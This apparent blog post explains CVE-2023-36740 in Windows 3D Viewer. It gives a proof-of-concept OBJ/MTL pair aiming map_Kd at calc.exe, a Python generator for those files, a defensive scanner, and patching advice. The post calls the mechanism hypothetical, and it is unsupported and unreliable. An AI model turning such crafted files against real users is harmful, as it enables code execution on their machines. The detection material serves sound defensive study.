CVE-2023-36740 - Breaking Down the 3D Viewer Remote Code Execution Vulnerability

In September 2023, Microsoft disclosed a serious vulnerability in its 3D Viewer app, tracked as CVE-2023-36740. This bug allows attackers to run malicious code on a victim’s computer—just by tricking them into opening a specially crafted file. Here, we’ll simplify the technical details, walk through how it works, look at a possible exploit, and share resources for further reading.

What Is 3D Viewer?

3D Viewer is a Windows app (formerly "Mixed Reality Viewer") used for opening, editing, and interacting with three-dimensional models. It’s installed by default on many Windows machines.

What Is CVE-2023-36740?

CVE-2023-36740 is a Remote Code Execution (RCE) vulnerability. That means an attacker can run any code of their choice—potentially installing malware or taking over your PC—without your consent, just by getting you to open a booby-trapped 3D file.

Microsoft’s official security bulletin is here:
Microsoft Security Update Guide - CVE-2023-36740

Vulnerability Overview

3D Viewer supports various file formats, including .glb, .obj and .fbx. Because of an unsafe way 3D Viewer parses these files (OBJ and MTL files in particular), an attacker could craft a file that causes 3D Viewer to execute code the attacker placed inside it.

Technical Details & Example Malicious File

Let’s focus on the OBJ format. OBJ files can reference a “MTL” file (material library) and, under this bug, a malicious MTL file could trigger code execution.

Here’s the malicious OBJ file (exploit.obj):

mtllib evil.mtl
o EvilCube
v 0 0 0
v 1 0 0
v 1 1 0
v 0 1 0
f 1 2 3 4

And the malicious MTL file it references (evil.mtl):

newmtl MaliciousMaterial
map_Kd "C:\Windows\System32\calc.exe"

*If the parsing function improperly handles the map_Kd directive, it could try to run calc.exe.* (This is a simplified proof-of-concept; in reality, you’d use a more intricate payload.)

Disclaimer: Real exploits may use obfuscated or more creative payloads. This example is for educational explanation only.

Proof of Concept Snippet (Hypothetical)

If you have access to 3D Viewer on an unpatched Windows system (prior to the September 2023 patch), opening the above files *could* trigger the exploit.

For researchers, a quick Python script could generate the files:

# exploit_generator.py
# Writes the two files shown above: a single square face whose material
# library points map_Kd at an executable instead of a texture image.

obj_content = """mtllib evil.mtl
o EvilCube
v 0 0 0
v 1 0 0
v 1 1 0
v 0 1 0
f 1 2 3 4
"""

mtl_content = """newmtl MaliciousMaterial
map_Kd "C:\\Windows\\System32\\calc.exe"
"""

with open("exploit.obj", "w") as f:
    f.write(obj_content)

with open("evil.mtl", "w") as f:
    f.write(mtl_content)

Who is affected: Windows 10 and possibly Windows 11 users, since 3D Viewer is pre-installed.

Attackers only need to convince a user to open the malicious file.

Detection and Mitigation

Detection:
Monitor for suspicious OBJ/MTL file downloads, and for unusual launches of 3DViewer.exe or of other programs started by it.
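
As an added example (not code from the original post or from Microsoft), the following Python script makes this check concrete for the mechanism described above: it parses OBJ files for mtllib references and MTL files for texture-map directives, and flags any referenced path that is absolute or UNC, traverses directories, or does not end in an image extension, which is exactly what the map_Kd line in evil.mtl does. The sample inputs are constructed for the demonstration.

```python
import re
from pathlib import PureWindowsPath
# MTL directives whose argument is a file path (texture and reflection maps).
MAP_DIRECTIVES = {"map_Ka", "map_Kd", "map_Ks", "map_Ns", "map_d", "map_bump", "bump", "disp", "decal", "refl"}
# File types a material library is expected to reference; anything else is suspect.
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".bmp", ".tga", ".tif", ".tiff", ".dds"}

def _path_reasons(path, require_image=True):
    """Return the reasons a referenced path looks suspicious (empty if it looks benign)."""
    p = PureWindowsPath(path)
    reasons = []
    if p.is_absolute():  # drive-letter or UNC path instead of a relative texture
        reasons.append("absolute or UNC path")
    if ".." in p.parts:  # escapes the model's own directory
        reasons.append("directory traversal")
    if require_image and p.suffix.lower() not in IMAGE_EXTENSIONS:
        reasons.append(f"non-image extension {p.suffix or '(none)'}")
    return reasons

def _last_path_arg(arg):
    """Map directives may carry options before the path: take a quoted path or the last token."""
    m = re.match(r'"([^"]*)"', arg)
    return m.group(1) if m else arg.split()[-1]

def scan_mtl(mtl_text):
    """Return (line_no, directive, path, reasons) for each suspicious map reference in an MTL file."""
    findings = []
    for n, line in enumerate(mtl_text.splitlines(), 1):
        parts = line.strip().split(maxsplit=1)
        if len(parts) == 2 and parts[0] in MAP_DIRECTIVES:
            path = _last_path_arg(parts[1].strip())
            reasons = _path_reasons(path)
            if reasons:
                findings.append((n, parts[0], path, reasons))
    return findings

def scan_obj(obj_text):
    """Return (line_no, library, reasons) for each mtllib reference in an OBJ file."""
    refs = []
    for n, line in enumerate(obj_text.splitlines(), 1):
        parts = line.strip().split(maxsplit=1)
        if len(parts) == 2 and parts[0] == "mtllib":
            lib = parts[1].strip().strip('"')
            refs.append((n, lib, _path_reasons(lib, require_image=False)))
    return refs

# Constructed sample inputs: the evil.mtl from the post plus one ordinary material.
SAMPLE_MTL = 'newmtl MaliciousMaterial\nmap_Kd "C:\\Windows\\System32\\calc.exe"\nnewmtl Wood\nmap_Kd textures/oak.png\n'
SAMPLE_OBJ = "mtllib evil.mtl\no EvilCube\nv 0 0 0\nv 1 0 0\nv 1 1 0\nv 0 1 0\nf 1 2 3 4\n"
```

Run scan_obj on the OBJ and then scan_mtl on each library it names; every finding carries the line number and the reasons, so the check can sit in a download scanner or mail gateway rather than waiting for 3D Viewer to open the file.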

Mitigation:
Apply the September 2023 Microsoft security update, avoid opening 3D files from untrusted sources, and uninstall 3D Viewer if you do not use it.

References

- Microsoft Security Update Guide
- NVD - CVE-2023-36740 Details
- OBJ and MTL File Format Documentation

Final Notes

CVE-2023-36740 is a reminder that even simple, default-installed apps can hide dangerous bugs. Always stay updated, be careful with unknown files, and consider removing unused apps like 3D Viewer if you don’t need them.

Want to check your exposure?
Search for 3D Viewer in your Windows Start Menu. If you have it, make sure your patches are up-to-date.

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC